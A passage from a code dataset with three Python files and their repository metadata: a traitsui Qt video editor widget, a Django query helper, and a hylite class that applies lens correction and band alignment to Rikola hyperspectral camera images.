QVideoWidget\nfrom traits.api import (\n Any, Bool, Callable, Float, Instance, Range, Str, observe,\n)\nfrom traitsui.editors.video_editor import AspectRatio, MediaStatus, PlayerState\n\nfrom .editor import Editor\n\n#: Map from ApectRatio enum values to Qt aspect ratio behaviours.\naspect_ratio_map = {\n 'ignore': Qt.AspectRatioMode.IgnoreAspectRatio,\n 'keep': Qt.AspectRatioMode.KeepAspectRatio,\n 'expand': Qt.AspectRatioMode.KeepAspectRatioByExpanding,\n}\n\n#: Map from PlayerState enum values to QMediaPlayer states.\nif is_qt5:\n state_map = {\n 'stopped': QMediaPlayer.State.StoppedState,\n 'playing': QMediaPlayer.State.PlayingState,\n 'paused': QMediaPlayer.State.PausedState,\n }\nelse:\n state_map = {\n 'stopped': QMediaPlayer.PlaybackState.StoppedState,\n 'playing': QMediaPlayer.PlaybackState.PlayingState,\n 'paused': QMediaPlayer.PlaybackState.PausedState,\n }\n\n#: Map from QMediaPlayer states to PlayerState enum values.\nreversed_state_map = {value: key for key, value in state_map.items()}\n\n#: Map from QMediaPlayer media status values to MediaStatus enum values.\nmedia_status_map = {\n QMediaPlayer.MediaStatus.NoMedia: 'no_media',\n QMediaPlayer.MediaStatus.LoadingMedia: 'loading',\n QMediaPlayer.MediaStatus.LoadedMedia: 'loaded',\n QMediaPlayer.MediaStatus.StalledMedia: 'stalled',\n QMediaPlayer.MediaStatus.BufferingMedia: 'buffering',\n QMediaPlayer.MediaStatus.BufferedMedia: 'buffered',\n QMediaPlayer.MediaStatus.EndOfMedia: 'end',\n QMediaPlayer.MediaStatus.InvalidMedia: 'invalid',\n}\nif is_qt5:\n media_status_map[QMediaPlayer.MediaStatus.UnknownMediaStatus] = 'unknown'\n\n\nif is_qt5:\n # These classes support dynamically modifying the video stream frames but\n # only work on Qt5\n from pyface.qt.QtMultimedia import QAbstractVideoSurface\n\n class ImageWidget(QVideoWidget):\n \"\"\"Paints a QImage to the window body.\"\"\"\n\n def __init__(self, parent=None, image_func=None):\n import numpy as np\n\n super().__init__(parent)\n self.image = QImage()\n self._np_image = np.zeros(shape=(0, 0, 4))\n self.painter = None\n self.resizeEvent(None)\n if image_func is None:\n # Don't bother with creating an ndarray version\n self.image_func = lambda image, bbox: image, self._np_image\n else:\n self.image_func = image_func\n\n def resizeEvent(self, event):\n s = self.size()\n self.width = s.width()\n self.height = s.height()\n\n def setImage(self, image):\n self.image, self._np_image = self.image_func(\n image, (self.width, self.height)\n )\n self.update()\n\n def paintEvent(self, event):\n super().paintEvent(event)\n if self.painter is None:\n self.painter = QPainter()\n self.painter.begin(self)\n if self.image:\n self.painter.drawImage(QPoint(0, 0), self.image)\n self.painter.end()\n\n class VideoSurface(QAbstractVideoSurface):\n\n frameAvailable = Signal(['QImage'])\n\n def __init__(self, widget=None):\n super().__init__()\n self.widget = widget\n\n def supportedPixelFormats(self, handleType):\n return [QVideoFrame.Format_RGB32]\n\n def present(self, frame):\n from pyface.qt.QtMultimedia import QAbstractVideoBuffer\n\n cloned_frame = QVideoFrame(frame)\n cloned_frame.map(QAbstractVideoBuffer.ReadOnly)\n image = QImage(\n cloned_frame.bits(),\n cloned_frame.width(),\n cloned_frame.height(),\n cloned_frame.bytesPerLine(),\n QVideoFrame.imageFormatFromPixelFormat(\n cloned_frame.pixelFormat()\n ),\n )\n self.frameAvailable.emit(image)\n return True\n\n\nclass VideoEditor(Editor):\n \"\"\"Traits UI 'display only' video editor.\n\n This editor uses the Qt QMultimedia machinery to display video streams\n to the screen. Rather than being self-contained, the editor only concerns\n itself with displaying the video, and provides traits that control\n behaviour and provide internal state of the control during playback.\n \"\"\"\n\n #: Does the drawing onto the image plane\n control = Instance(QVideoWidget)\n\n #: Handles the image pulling so the frames can be processed. Qt5 only.\n surface = Any()\n\n #: The QMediaObject (Qt5) or QUrl (Qt6+) that holds the connection to the\n #: video stream.\n media_content = Any()\n\n #: The QMediaPlayer that controls playback of the video stream.\n media_player = Instance(QMediaPlayer)\n\n #: The aspect ratio of the video editor.\n aspect_ratio = AspectRatio()\n\n #: The current state of the player, synchronized to the trait named\n #: by factory.state.\n state = PlayerState()\n\n #: The current playback position of the player, synchronized to the trait\n #: named by factory.position.\n position = Float()\n\n #: The total duration of the current video, synchronized to the trait\n #: named by factory.duration.\n duration = Float()\n\n #: The media player playback status (loading, buffering, etc.),\n #: synchronized to the trait named by factory.media_status.\n media_status = MediaStatus()\n\n #: The percentage of the buffer currently filled, synchronized to the trait\n #: named by factory.buffer.\n buffer = Range(0, 100)\n\n #: A string holding the video error state, or \"\" if no error. Synchronized\n #: to the trait named by factory.video_error.\n video_error = Str()\n\n #: Whether the audio is muted or not, synchronized to the trait named by\n #: factory.muted.\n muted = Bool(False)\n\n #: The playback volume on a logarithmic scale (perceptually linear),\n #: synchronized to the trait named by factory.volume.\n volume = Range(0.0, 100.0)\n\n #: The playback rate. Negative values rewind the video.\n #: Synchronized to the trait named by factory.playback_rate.\n playback_rate = Float(1.0)\n\n #: Function to apply to the image. Takes ref to new frame and a size tuple.\n #: Synchronized to the trait named by factory.image_func.\n image_func = Callable()\n\n #: The change in position required for an update to be emitted.\n #: Synchronized to the trait named by factory.notify_interval.\n #: This is only used on Qt5.\n notify_interval = Float(1.0)\n\n #: Qt6-specific QAudioOutput handler.\n _audio = Any()\n\n def update_to_regular(self):\n if self.surface is not None:\n self.surface.frameAvailable.disconnect(self.control.setImage)\n self.surface = None\n\n self.control = QVideoWidget()\n self.control.setSizePolicy(\n QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Expanding\n )\n self.control.setBackgroundRole(QPalette.ColorRole.Window)\n self.media_player.setVideoOutput(self.control)\n\n def update_to_functional(self):\n self.control = ImageWidget(image_func=self.image_func)\n self.control.setSizePolicy(\n QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Expanding\n )\n self.control.setBackgroundRole(QPalette.ColorRole.Window)\n\n self.surface = VideoSurface(widget=self.control)\n self.surface.frameAvailable.connect(self.control.setImage)\n\n self.media_player.setVideoOutput(self.surface)\n\n # ------------------------------------------------------------------------\n # Editor interface\n # ------------------------------------------------------------------------\n\n def init(self, parent):\n \"\"\"Initialize the editor by creating the underlying toolkit widget.\n\n Parameters\n ----------\n parent : QWidget or None\n The parent widget for this widget.\n \"\"\"\n self.control = QVideoWidget()\n self.control.setSizePolicy(\n QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Expanding\n )\n self.control.setBackgroundRole(QPalette.ColorRole.Window)\n\n if is_qt5:\n self.media_player = QMediaPlayer(None, QMediaPlayer.VideoSurface)\n else:\n self.media_player = QMediaPlayer()\n self._set_video_url()\n self.media_player.setVideoOutput(self.control)\n if is_qt5:\n self.media_player.setMuted(self.muted)\n else:\n from pyface.qt.QtMultimedia import QAudioOutput\n\n self._audio = QAudioOutput()\n self._audio.setMuted(self.muted)\n self.media_player.setAudioOutput(self._audio)\n self._update_state()\n self._update_aspect_ratio()\n self._update_muted()\n self._update_volume()\n self._update_playback_rate()\n self._update_notify_interval()\n\n self._connect_signals()\n\n self.set_tooltip()\n\n def dispose(self):\n self._disconnect_signals()\n if self.media_player is not None:\n if not is_qt5:\n self.media_player.setSource(\"\")\n # Avoid a segfault if the media player is currently playing\n self.media_player.setVideoOutput(None)\n if not is_qt5:\n self.media_player.setAudioOutput(None)\n\n super().dispose()\n\n def update_editor(self):\n \"\"\"Update the editor when the object trait changes externally.\"\"\"\n self._set_video_url()\n\n # ------------------------------------------------------------------------\n # Private interface\n # ------------------------------------------------------------------------\n\n def _connect_signals(self):\n if self.media_player is not None:\n if is_qt5:\n self.media_player.stateChanged.connect(\n self._state_changed_emitted\n )\n self.media_player.error.connect(self._error_emitted)\n self.media_player.bufferStatusChanged.connect(\n self._buffer_status_changed_emitted\n )\n self.media_player.notifyIntervalChanged.connect(\n self._notify_interval_changed_emitted\n )\n else:\n self.media_player.playbackStateChanged.connect(\n self._state_changed_emitted\n )\n self.media_player.errorOccurred.connect(self._error_emitted)\n self.media_player.bufferProgressChanged.connect(\n self._buffer_status_changed_emitted\n )\n self.media_player.positionChanged.connect(\n self._position_changed_emitted\n )\n self.media_player.durationChanged.connect(\n self._duration_changed_emitted\n )\n self.media_player.mediaStatusChanged.connect(\n self._media_status_changed_emitted\n )\n\n def _disconnect_signals(self):\n if self.media_player is not None:\n if is_qt5:\n self.media_player.stateChanged.disconnect(\n self._state_changed_emitted\n )\n self.media_player.error.disconnect(self._error_emitted)\n self.media_player.bufferStatusChanged.disconnect(\n self._buffer_status_changed_emitted\n )\n self.media_player.notifyIntervalChanged.disconnect(\n self._notify_interval_changed_emitted\n )\n else:\n self.media_player.playbackStateChanged.disconnect(\n self._state_changed_emitted\n )\n self.media_player.errorOccurred.disconnect(self._error_emitted)\n self.media_player.bufferProgressChanged.disconnect(\n self._buffer_status_changed_emitted\n )\n self.media_player.positionChanged.disconnect(\n self._position_changed_emitted\n )\n self.media_player.durationChanged.disconnect(\n self._duration_changed_emitted\n )\n self.media_player.mediaStatusChanged.disconnect(\n self._media_status_changed_emitted\n )\n\n def _set_video_url(self):\n qurl = QUrl.fromUserInput(self.value)\n if is_qt5:\n from pyface.qt.QtMultimedia import QMediaContent\n if qurl.isValid():\n self.media_content = QMediaContent(qurl)\n else:\n self.media_content = QMediaContent(None)\n else:\n self.media_content = qurl\n self.control.updateGeometry()\n\n # Signal handlers -------------------------------------------------------\n\n def _state_changed_emitted(self, state):\n self.state = reversed_state_map[state]\n\n def _position_changed_emitted(self, position):\n # Avoid telling Qt about the new position in `_position_changed`\n with self.updating_value():\n self.position = position / 1000.0\n\n def _duration_changed_emitted(self, duration):\n self.duration = duration / 1000.0\n\n def _error_emitted(self, error):\n if error != QMediaPlayer.Error.NoError:\n self.video_error = self.media_player.errorString()\n else:\n self.video_error = ''\n\n def _media_status_changed_emitted(self, error):\n self.media_status = media_status_map[self.media_player.mediaStatus()]\n\n def _buffer_status_changed_emitted(self, error):\n if is_qt5:\n self.buffer = self.media_player.bufferStatus()\n else:\n self.buffer = int(self.media_player.bufferProgress() * 100)\n\n def _notify_interval_changed_emitted(self, interval):\n self.notify_interval = interval / 1000.0\n\n # Trait change handlers -------------------------------------------------\n\n @observe('aspect_ratio')\n def _aspect_ratio_observer(self, event):\n if self.control is not None:\n self._update_aspect_ratio()\n\n @observe('image_func')\n def _image_func_observer(self, event):\n if self.image_func is None:\n self.update_to_regular()\n elif not is_qt5:\n raise ValueError(\"image_func is not supported on Qt6\")\n else:\n self.update_to_functional()\n\n @observe('media_content')\n def _media_content_observer(self, event):\n self.video_error = ''\n if self.media_player is not None:\n if is_qt5:\n self.media_player.setMedia(self.media_content)\n else:\n self.media_player.setSource(self.media_content)\n\n @observe('muted')\n def _muted_observer(self, event):\n if self.media_player is not None:\n self._update_muted()\n\n @observe('playback_rate')\n def _playback_rate_observer(self, event):\n if self.media_player is not None:\n self._update_playback_rate()\n\n @observe('position')\n def _position_observer(self, event):\n if self.media_player is not None and not self.updating:\n # position is given in ms\n self.media_player.setPosition(int(self.position * 1000))\n\n @observe('state')\n def _state_observer(self, event):\n if self.media_player is not None:\n self._update_state()\n\n @observe('volume')\n def _volume_observer(self, event):\n if self.media_player is not None:\n self._update_volume()\n\n @observe('notify_interval')\n def _notify_interval_observer(self, event):\n if self.media_player is not None:\n self._update_notify_interval()\n\n # MediaPlayer management ------------------------------------------------\n\n def _update_aspect_ratio(self):\n self.control.setAspectRatioMode(aspect_ratio_map[self.aspect_ratio])\n\n def _update_muted(self):\n if is_qt5:\n self.media_player.setMuted(self.muted)\n else:\n self._audio.setMuted(self.muted)\n\n def _update_playback_rate(self):\n self.media_player.setPlaybackRate(self.playback_rate)\n\n def _update_state(self):\n if self.state == 'stopped':\n self.media_player.stop()\n self.control.repaint()\n elif self.state == 'playing':\n # XXX forcing a resize so video is scaled correctly on MacOS\n s = self.control.size()\n w = s.width()\n h = s.height()\n self.media_player.play()\n self.control.resize(w + 1, h + 1)\n self.control.resize(w, h)\n elif self.state == 'paused':\n self.media_player.pause()\n\n def _update_volume(self):\n linear_volume = QAudio.convertVolume(\n self.volume / 100.0,\n QAudio.VolumeScale.LogarithmicVolumeScale,\n QAudio.VolumeScale.LinearVolumeScale,\n )\n if is_qt5:\n self.media_player.setVolume(int(linear_volume * 100))\n else:\n self._audio.setVolume(linear_volume)\n\n def _update_notify_interval(self):\n # only used on Qt5\n if is_qt5:\n # interval is given in ms\n interval = int(self.notify_interval * 1000)\n self.media_player.setNotifyInterval(interval)\n","repo_name":"enthought/traitsui","sub_path":"traitsui/qt/video_editor.py","file_name":"video_editor.py","file_ext":"py","file_size_in_byte":17502,"program_lang":"python","lang":"en","doc_type":"code","stars":290,"dataset":"github-code","pt":"6"} +{"seq_id":"16639112119","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n__author__ = 'qing.li'\n\"\"\"\nfrom django.http import QueryDict\nfrom django.db.models import Q\n\n\ndef get_url(request):\n url = request.get_full_path()\n qd = QueryDict()\n qd._mutable = True\n qd['next_page'] = url\n # query_params = qd.urlencode()\n\n return qd\n\n\ndef get_query_condition(request, query_list):\n query = request.GET.get(\"query\", '')\n q = Q()\n q.connector = 'OR'\n for i in query_list:\n q.children.append(Q(('{}__icontains'.format(i), query)))\n\n return q","repo_name":"QingqinLi/nb_crm","sub_path":"utils/get_utils.py","file_name":"get_utils.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35253758855","text":"import os\nimport hylite.io as io\nfrom .sensor import Sensor\nimport numpy as np\nfrom pathlib import Path\nimport cv2\nfrom multiprocessing import Pool\nfrom tqdm import tqdm\nimport piexif\nimport matplotlib.pyplot as plt\n\nclass Rikola(Sensor):\n \"\"\"\n Implementation of sensor corrections for the Rikola sensor.\n \"\"\"\n\n # constants used for boundary tracking when correcting for sensor shift (spatial)\n LEFT_BOUND = 99999\n RIGHT_BOUND = 99998\n TOP_BOUND = 99997\n BOTTOM_BOUND = 99996\n\n @classmethod\n def correct_image(cls, image, verbose=True, **kwds):\n \"\"\"\n Apply sensor corrections to an image.\n\n Args:\n image (hylite.HyImage): a hyImage instance of an image captured using this sensor.\n verbose (str): true if updates/progress should be printed to the console. Default is True.\n **kwds: Optional keywords include:\n\n - crop = True if the image should be cropped so that only pixels covered by all bands after alignment are retained. Default is True.\n - align = True if the image bands should be coaligned using sift (due to delayed aquisition times). Default is True.\n - lens = True if the RIKOLA lens correction should be apply to correct for lens distortion. Default is True.\n - match_band = the band to co-register data to. This should be a good quality band (low noise etc.). Default is 30.\n - contrast_thresh = the contrast threshold used for SIFT matching. Default is 0.01.\n - sigma = the sigma to use for SIFT matching. Default is 1.5.\n - edge_thresh = the edge threshold to use for sift matching. Default is 10.\n - eq = equalise before sift? 'True' or 'False'. Default is 'False'.\n - match_dist = maximum matching distance for SIFT. Default is 0.7.\n - min_match = the minimum number of matches to apply band coregistration. Default is 5.\n - warp = the warping method used to align bands. Can be 'affine', 'homography' or 'flow'.\n Default is 'flow' aligns each band using 'affine' and then refines the result using dense optical flow.\n This is slow but corrects for errors associated with perspective and non-flat topography....\n\n \"\"\"\n\n #get keywords\n contrast_thresh = kwds.get(\"contrast_thresh\", 0.01)\n sigma = kwds.get(\"sigma\", 1.5)\n edge_thresh = kwds.get(\"edge_thresh\", 10)\n eq = kwds.get(\"eq\", False)\n match_dist = kwds.get(\"match_dist\", 0.7)\n min_match = kwds.get(\"min_match\", 5)\n warp = kwds.get(\"warp\", 'flow')\n match_band = kwds.get(\"match_band\", 30)\n crop = kwds.get('crop', True)\n align = kwds.get('align', True)\n lens = kwds.get('lens', True)\n\n # n.b. rikola camera already applies dark correction. Hence, we only need apply a lens correction and align the bands\n\n ###############################\n # LENS CORRECTION\n ###############################\n\n #Lens correction for NEW rikola camera\n if image.samples() == 1024: #new rikola\n\n #delete dodgy bands at start and end of spectral range\n image.band_names = image.header.get_wavelengths() #np.fromstring( image.header['wavelength'], sep=\",\" ) #load band wavelengths\n lower = np.argmin( image.band_names < 512 ) #first valid band\n upper = np.argmin( image.band_names < 914 ) #last valid band\n image.data = image.data[:,:,lower:upper] #delete dodgy bands\n image.band_names = image.band_names[lower:upper]\n\n if lens:\n #lens correction for sensor 1\n RIKMat = np.array(\n [[1559.169765826131 - 2.1075939987083148, -0.46558291934094703, 512. - 12.049303428088125],\n [0, 1559.169765826131, 512. + 10.043851873473248], [0, 0, 1]])\n RIKdist = np.array([[-0.22431431139011579, -0.25788278936781356, -0.00070123282637077225,\n 0.0023607284552227088, 1.3341497419995652]])\n m, roi = cv2.getOptimalNewCameraMatrix(RIKMat, RIKdist, (image.lines(), image.samples()), 1,\n (image.lines(), image.samples()))\n\n\n #lens correction for sensor 2\n RIKMat2 = np.array(\n [[1562.7573572611377 - 3.2133196257811703, 1.6878264077638325, 512. - 14.06301214860064],\n [0, 1562.7573572611377, 512. + 11.549906117342049], [0, 0, 1]])\n RIKdist2 = np.array([[-0.23799506683807267, -0.079495552793610855, 0.00085334990816270302,\n 0.0017596141854012402, 0.78590417508343857]])\n m2, roi2 = cv2.getOptimalNewCameraMatrix(RIKMat2, RIKdist2, (image.lines(), image.samples()), 1,\n (image.lines(), image.samples()))\n\n #find sensor gap where we change corrections (648 nm band)\n sensgap = np.argmin(image.get_wavelengths() < 648)\n\n # transpose into img[y][x][b]\n image.data = np.transpose(image.data, (1, 0, 2))\n\n # apply lens correction\n if verbose: print(\"Applying lens correction... \", end=\"\", flush=\"True\")\n image.data[:,:,0:sensgap] = cv2.undistort(image.data[:,:,0:sensgap], RIKMat, RIKdist, None, m)\n image.data[:,:,sensgap:] = cv2.undistort(image.data[:, :, sensgap::], RIKMat2, RIKdist2, None, m2)\n\n # crop\n x, y, w, h = roi2\n image.data = image.data[x:(x + w - 10), y:(y + h - 10)]\n\n if verbose: print(\"DONE.\", flush=\"True\")\n\n # transpose back to img[x][y][b]\n image.data = np.transpose(image.data, (1, 0, 2))\n\n\n #lens correction for OLD rikola cameara\n elif lens:\n # define camera correction parameters\n # camera matrix = ([[fx,skew,cx],[0,fy,cy],[0,0,1]])\n # distortion coefficients = ([[k1,k2,kp1,p2,k3]])\n # n.b. depending on the aquisition mode the rikola reads either the whole sensor (1010 lines) or half the sensor (658 lines). Hence we chose the camera matrix accordingly\n if image.lines() == 1010: #old rikola, full frame\n RIKMat = np.array([[1580, -0.37740987561726941, 532.14269389794072],\n [0, 1586.5023476977308, 552.87899983359080],\n [0, 0, 1]])\n\n RIKdist = np.array([[-0.34016504377397944, 0.15595251253428483, 0.00032919179911211665,\n 0.00016579344155373088, 0.051315602289989909]])\n\n elif image.lines() == 648: #old rikola, half frame\n RIKMat = np.array([[1580.9821817891338, -0.053468464819987738, 537.09531859948970],\n [0, 1580.4094746112266, 369.76442407125506],\n [0, 0, 1]])\n RIKdist = np.array([[-0.31408677145500508, -0.26653256083139154, 0.00028155583639827883,\n 0.00025705469073531660, 2.4100464839836362]])\n else:\n assert False, \"Error - invalid number of lines (%d) for RIKOLA image. Should be either 1010 or 648\" % (\n image.lines())\n\n # create calibration map\n m, roi = cv2.getOptimalNewCameraMatrix(RIKMat, RIKdist, (image.lines(), image.samples()), 1,\n (image.lines(), image.samples()))\n\n # transpose into img[y][x][b]\n image.data = np.transpose(image.data, (1, 0, 2))\n\n # loop through bands and apply correction\n if verbose: print(\"Applying lens correction... \", end=\"\", flush=\"True\")\n\n # apply lens correction\n image.data = cv2.undistort(image.data, RIKMat, RIKdist, None, m)\n\n # crop\n x, y, w, h = roi\n image.data = image.data[x:(x + w - 10), y:(y + h - 10)]\n\n if verbose: print(\"DONE.\", flush=\"True\")\n\n # transpose back to img[x][y][b]\n image.data = np.transpose(image.data, (1, 0, 2))\n\n ###############################\n # COREGISTER BANDS\n ###############################\n\n # flag boundary pixels in each band so we can crop it after warping\n image.edge_mask = np.zeros(image.data[:, :, 0:4].shape, dtype=np.float32)\n image.edge_mask[0:3, :, 0] = 1.0\n image.edge_mask[-4:-1, :, 1] = 1.0\n image.edge_mask[:, 0:3, 2] = 1.0\n image.edge_mask[:, -4:-1, 3] = 1.0\n edge_accum = np.zeros_like(image.edge_mask)\n if align:\n # identify SIFT features for each band\n if verbose: print(\"Identifying SIFT features... \", end=\"\", flush=\"True\")\n features = [image.get_keypoints(b) for b in range(image.band_count())]\n\n if verbose: print(\"DONE.\", flush=\"True\")\n\n if verbose: print(\"Stacking bands... \", end=\"\", flush=\"True\")\n\n # loop through bands and find matches\n matches = []\n for b in range(0, image.band_count()):\n if b == match_band:\n matches.append(None)\n continue # skip reference band as it doesn't need to be moved...\n if verbose: print(\"Matching bands... %d \" % int((100 * b) / image.band_count()) + \"% \\r\", end=\"\", flush=\"True\")\n\n # can we match this band with the reference band?\n src_pts, dst_pts = io.HyImage.match_keypoints(features[b][0], features[match_band][0],\n features[b][1], features[match_band][1],\n method='SIFT', dist=match_dist)\n matches.append((src_pts, dst_pts))\n\n if verbose: print(\"Matching bands... DONE. \", flush=\"True\")\n\n # apply transformation to each band\n for b in range(0, image.band_count()):\n if b == match_band: continue # skip reference band as it doesn't need to be moved...\n if verbose: print(\"Stacking bands... %d \" % int((100 * b) / image.band_count()) + \"% \\r\", end=\"\",flush=\"True\")\n\n # get match points\n src_pts, dst_pts = matches[b]\n if src_pts is None: # couldn't match with reference band, try matching with one of the already aligned bands\n print(\"Warning - could not directly band %d. Attempting indirect alignment... \" % b, end=\"\",\n flush=\"True\")\n i = 1\n while src_pts is None:\n if b - i < 0: # run out of bands\n print(\"Failed to align band\" % b)\n break\n\n # calculate features in aligned band\n feat2 = image.get_keypoints(b-i, eq=eq, contrastThreshold=contrast_thresh,\n edgeThreshold=edge_thresh, sigma=sigma)\n\n # try matching\n src_pts, dst_pts = io.HyImage.match_keypoints(features[b][0], feat2[0],\n features[b][1], feat2[1],\n dist=match_dist, method='sift')\n\n print(\"Aligned to band %d\" % (b - i))\n\n # do alignment\n if not src_pts is None:\n if ('affine' in warp.lower()) or ('flow' in warp.lower()):\n H, status = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n dst_mask = dst_pts[:, 0, :] * status\n src_mask = src_pts[:, 0, :] * status\n dst_mask = dst_mask[dst_mask.all(1)]\n src_mask = src_mask[src_mask.all(1)]\n dst_mask = np.expand_dims(dst_mask, axis=1)\n src_mask = np.expand_dims(src_mask, axis=1)\n #M = cv2.estimateRigidTransform(src_mask, dst_mask, False)\n M = cv2.estimateAffinePartial2D(src_mask, dst_mask)[0]\n\n # apply to image\n image.data[:, :, b] = cv2.warpAffine(image.data[:, :, b], M,\n (image.data.shape[1], image.data.shape[0]))\n\n # apply to edge mask\n for e in range(0, 4):\n edge_accum[:, :, e] += cv2.warpAffine(image.edge_mask[:, :, e], M,\n (image.edge_mask.shape[1], image.edge_mask.shape[0]))\n\n elif ('homography' in warp.lower()):\n H, status = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 3.0)\n\n # apply to image\n image.data[:, :, b] = cv2.warpPerspective(image.data[:, :, b], H,\n (image.data.shape[1], image.data.shape[0]))\n\n # apply to edge mask\n for e in range(0, 4):\n edge_accum[:, :, e] += cv2.warpPerspective(image.edge_mask[:, :, e], H,\n (image.edge_mask.shape[1],\n image.edge_mask.shape[0]))\n else:\n assert False, \"Error - unknown transformation type. Should be 'flow' or 'homography' or 'affine'.\"\n\n # update edge mask\n image.edge_mask = edge_accum\n\n # crop image to area of complete overlap\n xmin = np.min(np.where(np.sum(image.edge_mask[:, :, 0], axis=1) == 0.0))\n xmax = np.max(np.where(np.sum(image.edge_mask[:, :, 1], axis=1) == 0.0))\n ymin = np.min(np.where(np.sum(image.edge_mask[:, :, 2], axis=0) == 0.0))\n ymax = np.max(np.where(np.sum(image.edge_mask[:, :, 3], axis=0) == 0.0))\n if crop:\n image.data = image.data[xmin:xmax, ymin:ymax, :]\n else:\n image.data[:xmin, :, :] = 0.\n image.data[xmax:, :, :] = 0.\n image.data[:, :ymin, :] = 0.\n image.data[:, ymax:, :] = 0.\n\n # apply flow transform to aligned bands\n if 'flow' in warp.lower():\n\n # reset edge mask\n image.edge_mask = np.zeros(image.data[:, :, 0:4].shape, dtype=np.float32)\n image.edge_mask[0:3, :, 0] = 1.0\n image.edge_mask[-4:-1, :, 1] = 1.0\n image.edge_mask[:, 0:3, 2] = 1.0\n image.edge_mask[:, -4:-1, 3] = 1.0\n edge_accum = np.zeros_like(image.edge_mask)\n alg = cv2.optflow.createOptFlow_DeepFlow()\n X, Y = np.meshgrid(range(image.data.shape[1]), range(image.data.shape[0]))\n map = np.dstack([X, Y]).astype(np.float32)\n bnd1 = np.uint8(255 * (image.data[:, :, 0] - np.nanmin(image.data[:, :, 0])) /\n (np.nanmax(image.data[:, :, 0]) - np.nanmin(image.data[:, :, 0])))\n for b in range(1, image.band_count()):\n if verbose: print(\"Warping bands... %d \" % int((100 * b) / image.band_count()) + \"% \\r\", end=\"\",\n flush=\"True\")\n bnd2 = np.uint8(255 * (image.data[:, :, b] - np.nanmin(image.data[:, :, b])) /\n (np.nanmax(image.data[:, :, b]) - np.nanmin(image.data[:, :, b])))\n bnd1[bnd2 == 0.] = 0.\n bnd2[bnd1 == 0.] = 0.\n flow = alg.calc(bnd1, bnd2, None)\n map[:, :, 0] += flow[:, :, 0]\n map[:, :, 1] += flow[:, :, 1]\n image.data[:, :, b] = cv2.remap(image.data[:, :, b], map, None, cv2.INTER_LINEAR)\n image.data[:, :, b][bnd2 == 0.] = 0.\n for e in range(0, 4):\n edge_accum[:, :, e] += cv2.remap(image.edge_mask[:, :, e], map, None, cv2.INTER_LINEAR)\n bnd1 = bnd2\n\n image.edge_mask = edge_accum\n\n # crop again\n\n xmin = np.min(np.where(np.sum(image.edge_mask[:, :, 0], axis=1) == 0.0))\n xmax = np.max(np.where(np.sum(image.edge_mask[:, :, 1], axis=1) == 0.0))\n ymin = np.min(np.where(np.sum(image.edge_mask[:, :, 2], axis=0) == 0.0))\n ymax = np.max(np.where(np.sum(image.edge_mask[:, :, 3], axis=0) == 0.0))\n if crop:\n image.data = image.data[xmin:xmax, ymin:ymax, :]\n else:\n image.data[:xmin, :, :] = 0.\n image.data[xmax:, :, :] = 0.\n image.data[:, :ymin, :] = 0.\n image.data[:, ymax:, :] = 0.\n if verbose: print(\"Warping bands... DONE. \", flush=\"True\")\n\n @classmethod\n def correct_folder(cls, path, **kwds):\n \"\"\"\n Many sensors use simple/common data structures to store data/headers/dark reference etc. Hence it is often easiest\n to pass an output folder to the sensor for correction.\n\n Args:\n path (str): a path to the folder containing the sensor specific data.\n **kwds: Keywords will be passed to correct_image, except for:\n\n - multi = True if multiple threads will be spawned to processes images in parallel. Default is True.\n - nthreads = the number of worker threads to spawn if multithreaded is true. Default is the number of CPU cores.\n\n Returns:\n A hyImage to which all sensor-specific corrections have been applied. Note that this will generally not include\n topographic or atmospheric corrections.\n \"\"\"\n\n assert os.path.isdir(path), \"Error - %s is not a valid directory path\" % path\n assert os.path.exists(path), \"Error - could not find %s\" % path\n\n #get keywords\n multi = kwds.get('multi', True)\n nthread = kwds.get('nthreads', os.cpu_count())\n overwrite = kwds.get('overwrite', False)\n\n if nthread is None:\n print(\"Warning - could not identify CPU count. Multithreading disabled.\")\n multi = False\n\n #find images to process\n images = list(Path(path).rglob(\"*Calib*[0-9][0-9][0-9][0-9][0-9].hdr\")) #old rikola files\n images += list(Path(path).rglob(\"*Sequence*[0-9][0-9][0-9][0-9][0-9].hdr\")) #new rikola files\n\n if not overwrite: # ignore already corrected files\n images = [x for x in images if list(Path(path).rglob(x.name[:-4] + \"_CORRECTED.hdr\")) == []]\n\n corrected = []\n print(\"Processing %d images with the following settings: %s\" % (len(images),kwds))\n if multi: #run in multithreaded\n p = Pool(processes = nthread) #setup pool object with n threads\n corrected = list(tqdm( p.imap_unordered(Rikola._cmp, [(i, kwds) for i in images]), total=len(images),leave=False)) #distribute tasks\n else: #not multithreaded\n for pth in tqdm(images,leave=False):\n # noinspection PyCallByClass\n corrected.append(Rikola._cmp( (pth, kwds) ) )#\n\n return corrected\n\n # define worker function for correct_folder( ... ) multithreading\n @classmethod\n def _cmp(cls, args):\n pth = str(args[0])\n kwds = args[1]\n image = io.load(pth) # load image\n Rikola.correct_image(image, False, **kwds) # correct image\n io.saveWithGDAL(os.path.splitext(pth)[0] + \"_CORRECTED.hdr\", image) # save corrected image\n return os.path.splitext(pth)[0] + \"_CORRECTED.hdr\" # return corrected path\n\n @classmethod\n def GPS_JPG(cls, MAIN):\n \"\"\"\n Creates geotagged RGB JPGs for a folder of calibrated Rikola images and stores them in a subfolder \"RGB/\"\n\n Args:\n MAIN (str): path to the folder containing the image data (ending with \"CORRECTED.dat\")\n as well as the acquisition-specific \"TASKFILE.TXT\"\n\n \"\"\"\n\n try:\n import osgeo.gdal as gdal # todo - remove GDAL dependency for this function (replace with Pillow?)\n except:\n assert False, \"Error - the GPS_JPG function requires GDAL to be installed.\"\n\n # create new folder for file storage\n if not os.path.exists(MAIN + 'RGB/'):\n os.makedirs(MAIN + 'RGB/')\n\n # read taskfile.txt containing GPS information\n with open(MAIN + 'TASKFILE.TXT') as f:\n task = f.readlines()\n task = np.asarray(task[60:])\n taskfile = np.asarray([task[i].split(\",\") for i in range(len(task))])\n\n # collect filelist for processing\n filelist = [root + '/' + file for root, _, files in os.walk(MAIN) for file in files if\n \"_CORRECTED.dat\" in file and \"xml\" not in file]\n\n # processing for each file in filelist\n for file in filelist:\n\n # read 3 bands (RGB) as PIL image\n raster = gdal.Open(file)\n band1 = raster.GetRasterBand(23).ReadAsArray()\n band2 = 